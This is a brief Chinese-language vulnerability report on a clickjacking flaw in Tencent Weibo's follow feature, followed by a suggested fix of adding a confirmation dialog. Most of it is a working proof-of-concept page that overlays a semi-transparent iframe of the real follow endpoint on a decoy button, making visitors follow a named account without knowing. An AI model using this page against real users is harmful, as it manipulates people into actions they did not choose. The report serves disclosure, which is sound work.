腾讯微博关注功能点击劫持漏洞,可以让其它微博用户在不知情的情况下关注你.
这个漏洞应该算是对/Article/201301/184404.html的一个补充吧,不是所有情况都可以用防嵌入来解决点击劫持.具体看
<script>
var xx=0;
var yy=0;
window.onload=function (e){
var iframe = document.getElementById('xxx');
iframe.style.left=a.offsetLeft-xx;
iframe.style.top=a.offsetTop-yy;
}
</script>
<iframe style="position:absolute;opacity: 0.5;filter:alpha(opacity=50);z-index:1;" id=xxx src="http://follow.v.t.qq.com/index.php?c=follow&a=quick&name=jackmasa&style=4&t=1342759674261&f=0#" WIDTH=100 height=25></iframe>
<br><br></br><br></br><br></br><center><button id=a>我勒个去</button></center>
修复方案:
加confirm确认框.
为什么我觉得腾讯不会修复这个漏洞?